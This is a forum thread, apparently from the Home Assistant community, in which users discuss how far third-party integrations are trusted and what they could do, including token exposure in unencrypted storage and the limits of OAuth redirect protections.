I am wondering about the security of using external integrations e.g., from the community store. Is there anything that prevents integrations from “just doing what they want”?
For example, could an integration from the community store simply contain an automation which by chance sends unlock commands for known smart lock brands at 9 PM - hoping that this very household contains such a lock.
Yes, it could. Now, nobody has any clue where you live, so that’s of limited use for actual thieves. It could also send those information to some external site, though.
Your only safety barrier is the ability to read the code (and community trust).
Unless this same code is able to send the lat/lon of zone ‘home’ to the outside?
Aside the security vs. locks, there are probably other risks too as one installs things quite easily and afaik this bypasses any virus/introsuion/etc. scanner
EDIT: unless I totally missed that, it may be a good idea to write a chapter on security/risks/etc.
You. You are the only thing between your HA instance and an integration… Integrations install in the HA code spafe and become part of your HA install. That means there is zero internal security boundary and you need to do your own review / analysis of the integration code (posted in its repo)
Do most people do it. Admittedly no. But that’s the model. Look before you leap and pay close attention to what integrations you install.
Keep in mind that this is not specific to custom integrations, any integration can do any harmful things as we are enforcing any integration to own an external api library to keep business logic.
By the way, any integration can access any other integration’s configuration (username, password, oath key etc).
I’m definitely not an expert on this but have heard others say that this is not the security risk you think it is. The key is used once to set up the connection and can not be reused. At least that is what I took from the discussion.
Yeah. Python itself is a nightmare as far as code segregation/segmentation/sandboxing goes.
Every bit of code can go anywhere in the python virtual machine, basically.
There is no such thing as an “oauth key”.
You have client id/secrets, access tokens and refresh tokens.
Access token is what is used to access the resources, so if those are long-lived, you are screwed.
Client id/secrets is what is used to get the initial access/refresh tokens, so those are leaked, you are screwed.
Refresh tokens are longer-lived than access token, and are used to get new access tokens (unless the refresh token has been found leaked and disposed of). If those are unknowingly leaked, you are screwed.
So yeah, quite a big deal, really.
Worse is that all those informations are in plain, unencrypted, sight in .storage.
Bottom-line: Currently, HA is a security nightmare
Redirect URIs defined in application on server side, example integration is home connect.
If request doesn’t arrive from myha.duckdns.org, it is not executed. And at the end, it redirects the user to specified callback url but nowhere else.
I’m not skilled enough to read through all the code looking for potential issues. But I am skilled enough to capture and analyze the network traffic (Wireshark) from/to HA or any other device on my network. Then I can use firewall rules to control that traffic.
Yep, but that’s only for “Authorization code” oauth2 flow (a flow is basically “how to get the tokens”), and only to obtain the access and refresh tokens.
Once those are stored in HA, they are “hackable” at will until both tokens expire. You’ll notice that the tokens are expired when the integration asks you to login again, if that ever happens
Then again, the integration tells you to use https://my.home-assistant.io/redirect/oauth as the callback url, which is using the My Home Assistant integration, which amounts (again) as zero security at all if the client id/client secret is leaked